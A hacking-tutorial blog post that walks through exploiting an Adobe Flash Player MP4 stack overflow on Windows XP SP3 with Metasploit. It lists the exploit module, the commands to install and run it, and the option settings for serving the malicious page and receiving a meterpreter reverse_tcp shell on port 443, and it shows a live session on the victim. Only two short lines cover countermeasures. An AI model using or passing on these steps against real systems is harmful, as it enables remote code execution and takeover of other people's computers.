• +
Hacking Tutorial Windows XP SP3 using Adobe Flash Player MP4 Vulnerability

Hacking Tutorial Windows XP SP3 using Adobe Flash Player MP4 Vulnerability

Bookmark

Type : Tutorial

Level : Medium

Attacker O.S : Backtrack 5 R1

Victim O.S : Windows XP SP 3

Vulnerable Application : Adobe Flash Player

Exploit Credits : Alexander Gavrun, Abysssec, Sinn3r

This module exploits a vulnerability found in Adobe Flash Player's Flash10u.ocx component.  When processing a MP4 file (specifically the Sequence Parameter Set), Flash will see if pic_order_cnt_type is equal to 1, which sets the num_ref_frames_in_pic_order_cnt_cycle field, and then blindly copies data in offset_for_ref_frame on the stack, which allows arbitrary remote code execution under the context of the user.  Numerous reports also indicate that this vulnerability has been exploited in the wild.

Please note that the exploit requires a SWF media player in order to trigger the bug, which currently isn't included in the framework.  However, software such as Longtail SWF Player is free for non-commercial use, and is easily obtainable.

Requirements :

1. Vulnerable Adobe Flash Player (download link)

Mediafire.com

 

 

2. Adobe Flash sps Exploit

Mediafire.com

 

Step by Step :

1. Download the vulnerable flash application then install on victim operating system(win XP SP3) and also the exploit from the mediafire.com link above. Copy the exploit to

cp adobe_flash_sps.rb /pentest/exploits/framework/modules/exploits/windows/browser/

2. Run your Metasploit using msfconsole command, and use the exploit you've just added on step 1.

Hacking Tutorial Windows XP SP3 using Adobe Flash Player MP4 Vulnerability

I'm still using meterpreter reverse_tcp as my favourite payload until now ๐Ÿ˜›

3. Use show options command to view available switch for this exploit and the payload that you need to configure to perform this attack. In this picture below I'm only configure the basic thing to make this exploit work.

Hacking Tutorial Windows XP SP3 using Adobe Flash Player MP4 Vulnerability

Information :

set srvhost 192.168.1.5 --> set ip address for computer act as attacker server

set srvport 80 --> set port that used to serve incoming connection

set swf_player_uri http://www.jeroenwijering.com/embed/mediaplayer.swf --> this one used to trigger the bug

set uripath flashplayer --> this for make the URL more friendly

set lhost 192.168.1.5 --> set ip of the attacker host that will handle connect back from victim

set lport 443 --> connect back port that use for incoming connection from victim

exploit --> run the server + payload

4. After we run exploit command, we will start to act as attacker webserver  and ready to receive a connection. Our attacker webserver can be accessed by victim using an address that already described on step 3. The following picture below was taken when victim accessed the URL.

Hacking Tutorial Windows XP SP3 using Adobe Flash Player MP4 Vulnerability

5. Yep we're already interacting with the victim, and if we see on step 4 the exploit try to migrate its process into notepad.exe. Use sessions -i 1 to interract with active session number 1. (to view the list of active sessions, run sessions -l command).

Hacking Tutorial Windows XP SP3 using Adobe Flash Player MP4 Vulnerability

Pwn3D!! we're in ๐Ÿ™‚

Countermeasures :

1. Update your Adobe flash player into the latest version

2. Do not open a URL sent by someone you didn't know(even the people you know) if you didn't know what it is.

Hope you enjoyed ๐Ÿ™‚

Subscribe Now To Get Latest Hacking Tutorial on Your E-Mail

Share this article if you found this post was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com

  • Pingback: Hacking Tutorial Windows XP SP3 using Adobe Flash Player MP4 โ€ฆ | Flash | Adobe-Tutorial.com()

  • silent-hacker

    how to make update in metasploit please ๐Ÿ™‚

    • v4L

      #silent-hacker
      use msfupdate command from your metasploit console.